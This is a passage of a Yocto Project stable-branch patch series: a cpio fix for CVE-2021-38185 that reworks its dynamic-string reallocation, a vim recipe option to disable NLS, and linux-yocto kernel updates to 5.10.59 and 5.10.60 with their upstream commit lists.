+diff --git a/src/dstring.h b/src/dstring.h
+index b5135fe..f5b04ef 100644
+--- a/src/dstring.h
++++ b/src/dstring.h
+@@ -17,10 +17,6 @@
+    Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
+    Boston, MA 02110-1301 USA.  */
+ 
+-#ifndef NULL
+-#define NULL 0
+-#endif
+-
+ /* A dynamic string consists of record that records the size of an
+    allocated string and the pointer to that string.  The actual string
+    is a normal zero byte terminated string that can be used with the
+@@ -30,22 +26,25 @@
+ 
+ typedef struct
+ {
+-  int ds_length;		/* Actual amount of storage allocated.  */
+-  char *ds_string;		/* String.  */
++  size_t ds_size;   /* Actual amount of storage allocated.  */
++  size_t ds_idx;    /* Index of the next free byte in the string. */
++  char *ds_string;  /* String storage. */
+ } dynamic_string;
+ 
++#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL }
+ 
+-/* Macros that look similar to the original string functions.
+-   WARNING:  These macros work only on pointers to dynamic string records.
+-   If used with a real record, an "&" must be used to get the pointer.  */
+-#define ds_strlen(s)		strlen ((s)->ds_string)
+-#define ds_strcmp(s1, s2)	strcmp ((s1)->ds_string, (s2)->ds_string)
+-#define ds_strncmp(s1, s2, n)	strncmp ((s1)->ds_string, (s2)->ds_string, n)
+-#define ds_index(s, c)		index ((s)->ds_string, c)
+-#define ds_rindex(s, c)		rindex ((s)->ds_string, c)
++void ds_init (dynamic_string *string);
++void ds_free (dynamic_string *string);
++void ds_reset (dynamic_string *s, size_t len);
+ 
+-void ds_init (dynamic_string *string, int size);
+-void ds_resize (dynamic_string *string, int size);
++/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */
+ char *ds_fgetname (FILE *f, dynamic_string *s);
+ char *ds_fgets (FILE *f, dynamic_string *s);
+ char *ds_fgetstr (FILE *f, dynamic_string *s, char eos);
++void ds_append (dynamic_string *s, int c);
++void ds_concat (dynamic_string *s, char const *str);
++
++#define ds_len(s) ((s)->ds_idx)
++
++int ds_endswith (dynamic_string *s, int c);
++
+diff --git a/src/util.c b/src/util.c
+index 4421b20..6d6bbaa 100644
+--- a/src/util.c
++++ b/src/util.c
+@@ -846,11 +846,9 @@ get_next_reel (int tape_des)
+   FILE *tty_out;		/* File for interacting with user.  */
+   int old_tape_des;
+   char *next_archive_name;
+-  dynamic_string new_name;
++  dynamic_string new_name = DYNAMIC_STRING_INITIALIZER;
+   char *str_res;
+ 
+-  ds_init (&new_name, 128);
+-
+   /* Open files for interactive communication.  */
+   tty_in = fopen (TTY_NAME, "r");
+   if (tty_in == NULL)
+@@ -925,7 +923,7 @@ get_next_reel (int tape_des)
+     error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"),
+ 	   old_tape_des, tape_des);
+ 
+-  free (new_name.ds_string);
++  ds_free (&new_name);
+   fclose (tty_in);
+   fclose (tty_out);
+ }
+-- 
+2.25.1
+
+
+From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Wed, 11 Aug 2021 18:10:38 +0300
+Subject: [PATCH 2/3] Fix previous commit
+
+* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a
+loop.
+---
+ src/dstring.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/dstring.c b/src/dstring.c
+index 358f356..90c691c 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -64,7 +64,7 @@ void
+ ds_reset (dynamic_string *s, size_t len)
+ {
+   while (len > s->ds_size)
+-    ds_resize (s);
++    s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
+   s->ds_idx = len;
+ }
+ 
+@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str)
+ {
+   size_t len = strlen (str);
+   while (len + 1 > s->ds_size)
+-    ds_resize (s);
++    s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
+   memcpy (s->ds_string + s->ds_idx, str, len);
+   s->ds_idx += len;
+   s->ds_string[s->ds_idx] = 0;
+-- 
+2.25.1
+
+
+From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Wed, 18 Aug 2021 09:41:39 +0300
+Subject: [PATCH 3/3] Fix dynamic string reallocations
+
+* src/dstring.c (ds_resize): Take additional argument: number of
+bytes to leave available after ds_idx.  All uses changed.
+---
+ src/dstring.c | 18 ++++++++----------
+ 1 file changed, 8 insertions(+), 10 deletions(-)
+
+diff --git a/src/dstring.c b/src/dstring.c
+index 90c691c..0f597cc 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -49,9 +49,9 @@ ds_free (dynamic_string *string)
+ /* Expand dynamic string STRING, if necessary.  */
+ 
+ void
+-ds_resize (dynamic_string *string)
++ds_resize (dynamic_string *string, size_t len)
+ {
+-  if (string->ds_idx == string->ds_size)
++  while (len + string->ds_idx >= string->ds_size)
+     {
+       string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
+ 				      1);
+@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string)
+ void
+ ds_reset (dynamic_string *s, size_t len)
+ {
+-  while (len > s->ds_size)
+-    s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
++  ds_resize (s, len);
+   s->ds_idx = len;
+ }
+ 
+@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+   /* Read the input string.  */
+   while ((next_ch = getc (f)) != eos && next_ch != EOF)
+     {
+-      ds_resize (s);
++      ds_resize (s, 0);
+       s->ds_string[s->ds_idx++] = next_ch;
+     }
+-  ds_resize (s);
++  ds_resize (s, 0);
+   s->ds_string[s->ds_idx] = '\0';
+ 
+   if (s->ds_idx == 0 && next_ch == EOF)
+@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ void
+ ds_append (dynamic_string *s, int c)
+ {
+-  ds_resize (s);
++  ds_resize (s, 0);
+   s->ds_string[s->ds_idx] = c;
+   if (c)
+     {
+       s->ds_idx++;
+-      ds_resize (s);
++      ds_resize (s, 0);
+       s->ds_string[s->ds_idx] = 0;
+     }      
+ }
+@@ -115,8 +114,7 @@ void
+ ds_concat (dynamic_string *s, char const *str)
+ {
+   size_t len = strlen (str);
+-  while (len + 1 > s->ds_size)
+-    s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
++  ds_resize (s, len);
+   memcpy (s->ds_string + s->ds_idx, str, len);
+   s->ds_idx += len;
+   s->ds_string[s->ds_idx] = 0;
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/cpio/cpio_2.13.bb b/meta/recipes-extended/cpio/cpio_2.13.bb
index f4df826ed9..f3f2be17df 100644
--- a/meta/recipes-extended/cpio/cpio_2.13.bb
+++ b/meta/recipes-extended/cpio/cpio_2.13.bb
@@ -9,6 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949"
 SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \
            file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
            file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \
+           file://CVE-2021-38185.patch \
            "
 
 SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810"
-- 
2.31.1

[hardknott][PATCH 06/11] vim: add option to disable NLS support

[Anuj Mittal]

From: Andrej Valek <andrej.valek@siemens.com>

- Some distributions with UTF-8 locale have problem when National Language
Support is enabled. Add there an option to disable it.

Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit da630d6d81a396c3e1635fbd7b8103df47ed2732)
Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
---
 meta/recipes-support/vim/vim.inc | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/meta/recipes-support/vim/vim.inc b/meta/recipes-support/vim/vim.inc
index 878d0f18ae..6fe8fb90db 100644
--- a/meta/recipes-support/vim/vim.inc
+++ b/meta/recipes-support/vim/vim.inc
@@ -54,11 +54,12 @@ do_compile() {
     autotools_do_compile
 }
 
-#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny
+#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny selinux, elfutils, nls
 PACKAGECONFIG ??= ""
 PACKAGECONFIG += " \
     ${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \
     ${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \
+    nls \
 "
 
 PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3"
@@ -67,6 +68,7 @@ PACKAGECONFIG[x11] = "--with-x,--without-x,xt,"
 PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,,"
 PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux,"
 PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils,"
+PACKAGECONFIG[nls] = "--enable-nls,--disable-nls,,"
 
 EXTRA_OECONF = " \
     --disable-gpm \
-- 
2.31.1

[hardknott][PATCH 07/11] linux-yocto/5.10: update to v5.10.59

[Anuj Mittal]

From: Bruce Ashfield <bruce.ashfield@gmail.com>

Updating linux-yocto/5.10 to the latest korg -stable release that comprises
the following commits:

    5805e5eec901 Linux 5.10.59
    25cff25ec606 net: xilinx_emaclite: Do not print real IOMEM pointer
    6a002d48a660 ovl: prevent private clone if bind mount is not allowed
    bffead8d3648 ppp: Fix generating ppp unit id when ifname is not specified
    5df85901fe45 ALSA: hda: Add quirk for ASUS Flow x13
    8930f2c60a45 ALSA: hda/realtek: fix mute/micmute LEDs for HP ProBook 650 G8 Notebook PC
    98c3fa3a9d7a ALSA: pcm: Fix mmap breakage without explicit buffer setup
    cc1a4dff23a4 USB:ehci:fix Kunpeng920 ehci hardware problem
    bd909fd3878d vboxsf: Make vboxsf_dir_create() return the handle for the created file
    971703fc19cf vboxsf: Honor excl flag to the dir-inode create op
    96b2232cb7e5 arm64: dts: renesas: beacon: Fix USB ref clock references
    e0dd4a0ab072 arm64: dts: renesas: beacon: Fix USB extal reference
    0f47027d1b9b arm64: dts: renesas: rzg2: Add usb2_clksel to RZ/G2 M/N/H
    eaa7feecd366 mm: make zone_to_nid() and zone_set_nid() available for DISCONTIGMEM
    0e709390372f Revert "selftests/resctrl: Use resctrl/info for feature detection"
    d8c38598701f bpf: Add lockdown check for probe_write_user helper
    5b5064ea9a94 firmware: tee_bnxt: Release TEE shm, session, and context during kexec
    c5a625c6a4ac tee: Correct inappropriate usage of TEE_SHM_DMA_BUF flag
    9f105d2d4f6c KVM: SVM: Fix off-by-one indexing when nullifying last used SEV VMCB
    132a8267adab Linux 5.10.58
    3d7d1b0f5f41 arm64: fix compat syscall return truncation
    bb65051dcd1f drm/amdgpu/display: only enable aux backlight control for OLED panels
    c8b7cfa674ee smb3: rc uninitialized in one fallocate path
    8cfdd039ca18 net/qla3xxx: fix schedule while atomic in ql_wait_for_drvr_lock and ql_adapter_reset
    fbbb209268e5 alpha: Send stop IPI to send to online CPUs
    13d0a9b3b917 net: qede: Fix end of loop tests for list_for_each_entry
    1478e902bcbc virt_wifi: fix error on connect
    ecd8614809eb reiserfs: check directory items on read from disk
    dbe4f82fedc6 reiserfs: add check for root_inode in reiserfs_fill_super
    0f05e0ffa247 libata: fix ata_pio_sector for CONFIG_HIGHMEM
    11891adab23d drm/i915: avoid uninitialised var in eb_parse()
    a3e6bd0c71bb sched/rt: Fix double enqueue caused by rt_effective_prio
    c797b8872bb9 perf/x86/amd: Don't touch the AMD64_EVENTSEL_HOSTONLY bit inside the guest
    2d94cffc94a5 soc: ixp4xx/qmgr: fix invalid __iomem access
    7397034905ac drm/i915: Correct SFC_DONE register offset
    16aecf1e36d9 interconnect: qcom: icc-rpmh: Ensure floor BW is enforced for all nodes
    22b4917c85af interconnect: Always call pre_aggregate before aggregate
    ccfe4f62ff9f interconnect: Zero initial BW after sync-state
    05565b469358 spi: meson-spicc: fix memory leak in meson_spicc_remove
    1a084e78217d interconnect: Fix undersized devress_alloc allocation
    dcc23e58511b soc: ixp4xx: fix printing resources
    37cbd27ef4b2 arm64: vdso: Avoid ISB after reading from cntvct_el0
    7a2b5bb00f54 KVM: x86/mmu: Fix per-cpu counter corruption on 32-bit builds
    32f55c25ee29 KVM: Do not leak memory for duplicate debugfs directories
    309a31127bef KVM: x86: accept userspace interrupt only if no event is injected
    a786282b55b4 md/raid10: properly indicate failure when ending a failed write request
    3d7d2d2b069b ARM: omap2+: hwmod: fix potential NULL pointer access
    9851ad2f7107 Revert "gpio: mpc8xxx: change the gpio interrupt flags."
    57c44e7ac788 bus: ti-sysc: AM3: RNG is GP only
    f4984f60acc7 selinux: correct the return value when loads initial sids
    100f8396d154 pcmcia: i82092: fix a null pointer dereference bug
    afcd5a0e015f net/xfrm/compat: Copy xfrm_spdattr_type_t atributes
    f08b2d078cbb xfrm: Fix RCU vs hash_resize_mutex lock inversion
    23e36a8610ca timers: Move clearing of base::timer_running under base:: Lock
    9a69d0d24d69 fpga: dfl: fme: Fix cpu hotplug issue in performance reporting
    bfb5f1a12325 serial: 8250_pci: Avoid irq sharing for MSI(-X) interrupts.
    0f30fedced7c serial: 8250_pci: Enumerate Elkhart Lake UARTs via dedicated driver
    17f3c64f707b MIPS: Malta: Do not byte-swap accesses to the CBUS UART
    8a1624f4a8d3 serial: 8250: Mask out floating 16/32-bit bus bits
    c03cef67157a serial: 8250_mtk: fix uart corruption issue when rx power off
    a4f8bfc919ee serial: tegra: Only print FIFO error message when an error occurs
    cc7300776808 ext4: fix potential htree corruption when growing large_dir directories
    6b5a3d2c2b89 pipe: increase minimum default pipe size to 2 pages
    556e7f204d34 media: rtl28xxu: fix zero-length control request
    551e0c5d6b2e drivers core: Fix oops when driver probe fails
    faec2c68ea5f staging: rtl8712: error handling refactoring
    e468a357af68 staging: rtl8712: get rid of flush_scheduled_work
    369101e39911 staging: rtl8723bs: Fix a resource leak in sd_int_dpc
    1628b64efb36 tpm_ftpm_tee: Free and unregister TEE shared memory during kexec
    2a879ff9719f optee: fix tee out of memory failure seen during kexec reboot
    ad80c25987fe optee: Refuse to load the driver under the kdump kernel
    1340dc3fb75e optee: Fix memory leak when failing to register shm pages
    6b2ded93d35c tee: add tee_shm_alloc_kernel_buf()
    5e9d82021425 optee: Clear stale cache entries during initialization
    e5d8fd87091c arm64: stacktrace: avoid tracing arch_stack_walk()
    7799ad4d181f tracepoint: Fix static call function vs data state mismatch
    14673e19291c tracepoint: static call: Compare data on transition from 2->1 callees
    046e12323ab4 tracing: Fix NULL pointer dereference in start_creating
    b2aca8daa50e tracing: Reject string operand in the histogram expression
    b10ccc2c5888 tracing / histogram: Give calculation hist_fields a size
    f97274528037 scripts/tracing: fix the bug that can't parse raw_trace_func
    fd3afb81f448 clk: fix leak on devm_clk_bulk_get_all() unwind
    948ff2f214fb usb: otg-fsm: Fix hrtimer list corruption
    8f8645de092a usb: typec: tcpm: Keep other events when receiving FRS and Sourcing_vbus events
    5b4318885a43 usb: host: ohci-at91: suspend/resume ports after/before OHCI accesses
    1f2015506d9c usb: gadget: f_hid: idle uses the highest byte for duration
    825ac3f0bc35 usb: gadget: f_hid: fixed NULL pointer dereference
    683702dff7c8 usb: gadget: f_hid: added GET_IDLE and SET_IDLE handlers
    051518d9cfe3 usb: cdns3: Fixed incorrect gadget state
    822bec5cbb05 usb: gadget: remove leaked entry from udc driver list
    98c83d72614e usb: dwc3: gadget: Avoid runtime resume if disabling pullup
    79e9389038c4 ALSA: usb-audio: Add registration quirk for JBL Quantum 600
    b7532db2d458 ALSA: usb-audio: Fix superfluous autosuspend recovery
    80b7aa2651bc ALSA: hda/realtek: Fix headset mic for Acer SWIFT SF314-56 (ALC256)
    de30786fb25a ALSA: hda/realtek: add mic quirk for Acer SF314-42
    c0b626f0a29a ALSA: pcm - fix mmap capability check for the snd-dummy driver
    dd3f7c5c8904 drm/amdgpu/display: fix DMUB firmware version info
    ecb739cf15a9 firmware_loader: fix use-after-free in firmware_fallback_sysfs
    5019f5812bbf firmware_loader: use -ETIMEDOUT instead of -EAGAIN in fw_load_sysfs_fallback
    aa3b8bc17e2a USB: serial: ftdi_sio: add device ID for Auto-M3 OP-COM v2
    d245a76719cf USB: serial: ch341: fix character loss at high transfer rates
    0470385e63bb USB: serial: option: add Telit FD980 composition 0x1056
    ba4a395668b5 USB: usbtmc: Fix RCU stall warning
    f2f856b65ac4 Bluetooth: defer cleanup of resources in hci_unregister_dev()
    821e6a613354 blk-iolatency: error out if blk_get_queue() failed in iolatency_set_limit()
    c5a499b8607a net: vxge: fix use-after-free in vxge_device_unregister
    fb49d67262ca net: fec: fix use-after-free in fec_drv_remove
    f12b6b6bc15f net: pegasus: fix uninit-value in get_interrupt_interval
    c66d273b70fe bnx2x: fix an error code in bnx2x_nic_load()
    f76f9caccb46 mips: Fix non-POSIX regexp
    f93b7b000044 MIPS: check return value of pgtable_pmd_page_ctor
    9b2b2f07712b net: sched: fix lockdep_set_class() typo error for sch->seqlock
    d1f2abe57bc1 net: dsa: qca: ar9331: reorder MDIO write sequence
    a45ee8ed0c7d net: ipv6: fix returned variable type in ip6_skb_dst_mtu
    f87be69b7fe9 nfp: update ethtool reporting of pauseframe control
    44f2e360e784 sctp: move the active_key update after sh_keys is added
    e74551ba938a RDMA/mlx5: Delay emptying a cache entry when a new MR is added to it recently
    1242ca9369b1 gpio: tqmx86: really make IRQ optional
    4ef549dc9c1a net: natsemi: Fix missing pci_disable_device() in probe and remove
    1dc3eef381c1 net: phy: micrel: Fix detection of ksz87xx switch
    e09dba75cafd net: dsa: sja1105: match FDB entries regardless of inner/outer VLAN tag
    c0b14a0e61e7 net: dsa: sja1105: be stateless with FDB entries on SJA1105P/Q/R/S/SJA1110 too
    00bf923dce2a net: dsa: sja1105: invalidate dynamic FDB entries learned concurrently with statically added ones
    de425f1c3a60 net: dsa: sja1105: overwrite dynamic FDB entries with static ones in .port_fdb_add
    74bcf85ff1e2 net, gro: Set inner transport header offset in tcp/udp GRO hook
    80fd533ac3f9 dmaengine: imx-dma: configure the generic DMA type to make it work
    163e6d87216d ARM: dts: stm32: Fix touchscreen IRQ line assignment on DHCOM
    442f7e04d592 ARM: dts: stm32: Disable LAN8710 EDPD on DHCOM
    449991df08d5 media: videobuf2-core: dequeue if start_streaming fails
    3e8bba601212 scsi: sr: Return correct event when media event code is 3
    aaaf6e6e4174 spi: imx: mx51-ecspi: Fix low-speed CONFIGREG delay calculation
    cd989e119272 spi: imx: mx51-ecspi: Reinstate low-speed CONFIGREG delay
    281514da66a4 dmaengine: stm32-dmamux: Fix PM usage counter unbalance in stm32 dmamux ops
    bbce3c99f622 dmaengine: stm32-dma: Fix PM usage counter imbalance in stm32 dma ops
    84656b4c27bf clk: tegra: Implement disable_unused() of tegra_clk_sdmmc_mux_ops
    edf1b7911af2 dmaengine: uniphier-xdmac: Use readl_poll_timeout_atomic() in atomic state
    4ebd11d1c782 omap5-board-common: remove not physically existing vdds_1v8_main fixed-regulator
    9bf056b99fa0 ARM: dts: am437x-l4: fix typo in can@0 node
    e79a30f71d95 clk: stm32f4: fix post divisor setup for I2S/SAI PLLs
    71f39badc898 ALSA: usb-audio: fix incorrect clock source setting
    c4fcda128780 arm64: dts: armada-3720-turris-mox: remove mrvl,i2c-fast-mode
    8d13f6a0a656 arm64: dts: armada-3720-turris-mox: fixed indices for the SDHC controllers
    f239369f37d9 ARM: dts: imx: Swap M53Menlo pinctrl_power_button/pinctrl_power_out pins
    ee6f7084324d ARM: imx: fix missing 3rd argument in macro imx_mmdc_perf_init
    e1011b9c597d ARM: dts: colibri-imx6ull: limit SDIO clock to 25MHz
    c0f61abbefdf arm64: dts: ls1028: sl28: fix networking for variant 2
    54555c399668 ARM: dts: imx6qdl-sr-som: Increase the PHY reset duration to 10ms
    3790f940981d ARM: imx: add missing clk_disable_unprepare()
    a28569b510e5 ARM: imx: add missing iounmap()
    9189d77f0e21 arm64: dts: ls1028a: fix node name for the sysclk
    d61dc8c634bb net: xfrm: fix memory leak in xfrm_user_rcv_msg
    8efe3a635f22 bus: ti-sysc: Fix gpt12 system timer issue with reserved status
    e32a291736fc ALSA: seq: Fix racy deletion of subscriber
    b917f123b50d Revert "ACPICA: Fix memory leak caused by _CID repair function"

Signed-off-by: Bruce Ashfield <bruce.ashfield@gmail.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 07c7379180a5cda5a2b056aab99826469f41810a)
Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
---
 .../linux/linux-yocto-rt_5.10.bb              |  6 ++---
 .../linux/linux-yocto-tiny_5.10.bb            |  8 +++----
 meta/recipes-kernel/linux/linux-yocto_5.10.bb | 24 +++++++++----------
 3 files changed, 19 insertions(+), 19 deletions(-)

diff --git a/meta/recipes-kernel/linux/linux-yocto-rt_5.10.bb b/meta/recipes-kernel/linux/linux-yocto-rt_5.10.bb
index 351970c03a..44f570b6a9 100644
--- a/meta/recipes-kernel/linux/linux-yocto-rt_5.10.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-rt_5.10.bb
@@ -11,13 +11,13 @@ python () {
         raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it")
 }
 
-SRCREV_machine ?= "9ad4f13ee44c39e890638d8a2157adcf830fc7bc"
-SRCREV_meta ?= "22257690910a1befc2ed8a98ef218bd0c5cfd844"
+SRCREV_machine ?= "459fd323295a5bb19d8ccec0e29dd9d2ba367d81"
+SRCREV_meta ?= "8b02c1cd3424cee6f8d251be8fce9999e59fcf4e"
 
 SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine \
            git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.10;destsuffix=${KMETA}"
 
-LINUX_VERSION ?= "5.10.57"
+LINUX_VERSION ?= "5.10.59"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46"
 
diff --git a/meta/recipes-kernel/linux/linux-yocto-tiny_5.10.bb b/meta/recipes-kernel/linux/linux-yocto-tiny_5.10.bb
index b035ed3d15..1f1365be4d 100644
--- a/meta/recipes-kernel/linux/linux-yocto-tiny_5.10.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-tiny_5.10.bb
@@ -6,7 +6,7 @@ KCONFIG_MODE = "--allnoconfig"
 
 require recipes-kernel/linux/linux-yocto.inc
 
-LINUX_VERSION ?= "5.10.57"
+LINUX_VERSION ?= "5.10.59"
 LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46"
 
 DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
@@ -15,9 +15,9 @@ DEPENDS += "openssl-native util-linux-native"
 KMETA = "kernel-meta"
 KCONF_BSP_AUDIT_LEVEL = "2"
 
-SRCREV_machine_qemuarm ?= "60d8a10a1e8acdabbd61f3705b67b2112e7866e0"
-SRCREV_machine ?= "df4ea731a9dc6e1076f3e2935d6689668d8f58ac"
-SRCREV_meta ?= "22257690910a1befc2ed8a98ef218bd0c5cfd844"
+SRCREV_machine_qemuarm ?= "124fe0804bda0a51267a847c8e9578630fdbbc99"
+SRCREV_machine ?= "d2ff9c7472c1c748425c04d01e4a682501a0945c"
+SRCREV_meta ?= "8b02c1cd3424cee6f8d251be8fce9999e59fcf4e"
 
 PV = "${LINUX_VERSION}+git${SRCPV}"
 
diff --git a/meta/recipes-kernel/linux/linux-yocto_5.10.bb b/meta/recipes-kernel/linux/linux-yocto_5.10.bb
index 05cfa54480..254a0a42ad 100644
--- a/meta/recipes-kernel/linux/linux-yocto_5.10.bb
+++ b/meta/recipes-kernel/linux/linux-yocto_5.10.bb
@@ -13,17 +13,17 @@ KBRANCH_qemux86  ?= "v5.10/standard/base"
 KBRANCH_qemux86-64 ?= "v5.10/standard/base"
 KBRANCH_qemumips64 ?= "v5.10/standard/mti-malta64"
 
-SRCREV_machine_qemuarm ?= "21075c593dd7a09fc2e0fe4c1f751999fee1127a"
-SRCREV_machine_qemuarm64 ?= "e32f43fed15419c8461207c4d2b76879920d5928"
-SRCREV_machine_qemumips ?= "127501aba35af6e38f50ecd814da4416f361fd84"
-SRCREV_machine_qemuppc ?= "219057449c55acde1060af4b63c2d1ba5ec19978"
-SRCREV_machine_qemuriscv64 ?= "b1ff0bb0de7abc5039e0db14f66e01eb0a3c24bb"
-SRCREV_machine_qemuriscv32 ?= "b1ff0bb0de7abc5039e0db14f66e01eb0a3c24bb"
-SRCREV_machine_qemux86 ?= "b1ff0bb0de7abc5039e0db14f66e01eb0a3c24bb"
-SRCREV_machine_qemux86-64 ?= "b1ff0bb0de7abc5039e0db14f66e01eb0a3c24bb"
-SRCREV_machine_qemumips64 ?= "dd28c0cc8a79329b8b724821e7c09b210a2e2948"
-SRCREV_machine ?= "b1ff0bb0de7abc5039e0db14f66e01eb0a3c24bb"
-SRCREV_meta ?= "22257690910a1befc2ed8a98ef218bd0c5cfd844"
+SRCREV_machine_qemuarm ?= "0978a83dfdb5b685cb0bf102c806a768afb87ae9"
+SRCREV_machine_qemuarm64 ?= "4419f5b76905d079459659e22e68206295461cc4"
+SRCREV_machine_qemumips ?= "258e3d3c45063749d28d8c5f0be7f7de7a7a9a07"
+SRCREV_machine_qemuppc ?= "9b76cd9298382a9d1f49297a094def200504da38"
+SRCREV_machine_qemuriscv64 ?= "0e615f60692e56f2f0c68c1560c95804b8d9b6cf"
+SRCREV_machine_qemuriscv32 ?= "0e615f60692e56f2f0c68c1560c95804b8d9b6cf"
+SRCREV_machine_qemux86 ?= "0e615f60692e56f2f0c68c1560c95804b8d9b6cf"
+SRCREV_machine_qemux86-64 ?= "0e615f60692e56f2f0c68c1560c95804b8d9b6cf"
+SRCREV_machine_qemumips64 ?= "35aae8ce2453e7c72c933ec7b61df88b2dc49d55"
+SRCREV_machine ?= "0e615f60692e56f2f0c68c1560c95804b8d9b6cf"
+SRCREV_meta ?= "8b02c1cd3424cee6f8d251be8fce9999e59fcf4e"
 
 # remap qemuarm to qemuarma15 for the 5.8 kernel
 # KMACHINE_qemuarm ?= "qemuarma15"
@@ -32,7 +32,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA
            git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.10;destsuffix=${KMETA}"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46"
-LINUX_VERSION ?= "5.10.57"
+LINUX_VERSION ?= "5.10.59"
 
 DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
 DEPENDS += "openssl-native util-linux-native"
-- 
2.31.1

[hardknott][PATCH 08/11] linux-yocto/5.10: update to v5.10.60

[Anuj Mittal]

From: Bruce Ashfield <bruce.ashfield@gmail.com>

Updating linux-yocto/5.10 to the latest korg -stable release that comprises
the following commits:

    2c5bd949b1df Linux 5.10.60
    3a24e121304a net: dsa: microchip: ksz8795: Use software untagging on CPU port
    1e78179d75fb net: dsa: microchip: ksz8795: Fix VLAN untagged flag change on deletion
    5033d5e23155 net: dsa: microchip: ksz8795: Reject unsupported VLAN configuration
    60c007b52779 net: dsa: microchip: ksz8795: Fix PVID tag insertion
    f365d53c8687 net: dsa: microchip: Fix probing KSZ87xx switch with DT node for host port
    3dc5666baf2a KVM: nSVM: always intercept VMLOAD/VMSAVE when nested (CVE-2021-3656)
    c0883f693187 KVM: nSVM: avoid picking up unsupported bits from L2 in int_ctl (CVE-2021-3653)
    b5f05bdfda28 vmlinux.lds.h: Handle clang's module.{c,d}tor sections
    2fe07584a623 ceph: take snap_empty_lock atomically with snaprealm refcount change
    a23aced54c2c ceph: clean up locking annotation for ceph_get_snap_realm and __lookup_snap_realm
    b0efc93271ca ceph: add some lockdep assertions around snaprealm handling
    dcdb587ac470 vboxsf: Add support for the atomic_open directory-inode op
    7cd14c1a7fed vboxsf: Add vboxsf_[create|release]_sf_handle() helpers
    433f0b31ebec KVM: nVMX: Use vmx_need_pf_intercept() when deciding if L0 wants a #PF
    0ab67e3dfc4d KVM: VMX: Use current VMCS to query WAITPKG support for MSR emulation
    4a948c579ed6 efi/libstub: arm64: Double check image alignment at entry
    fc7da433fa16 powerpc/smp: Fix OOPS in topology_init()
    312730cd15e0 PCI/MSI: Protect msi_desc::masked for multi-MSI
    724d0a985086 PCI/MSI: Use msi_mask_irq() in pci_msi_shutdown()
    923368751866 PCI/MSI: Correct misleading comments
    e42fb8e6161e PCI/MSI: Do not set invalid bits in MSI mask
    042e03c9cdab PCI/MSI: Enforce MSI[X] entry updates to be visible
    0b2509d7a90c PCI/MSI: Enforce that MSI-X table entry is masked for update
    aa8092c1d1f1 PCI/MSI: Mask all unused MSI-X entries
    7e90e81a4b59 PCI/MSI: Enable and mask MSI-X early
    2d2c66848027 genirq/timings: Prevent potential array overflow in __irq_timings_store()
    355754194b48 genirq/msi: Ensure deactivation on teardown
    f0736bed18fb x86/resctrl: Fix default monitoring groups reporting
    25216ed97da8 x86/ioapic: Force affinity setup before startup
    19fb5dabedca x86/msi: Force affinity setup before startup
    4e52a4fe6f44 genirq: Provide IRQCHIP_AFFINITY_PRE_STARTUP
    2a28b52306f2 x86/tools: Fix objdump version check again
    4acc0d987141 powerpc/kprobes: Fix kprobe Oops happens in booke
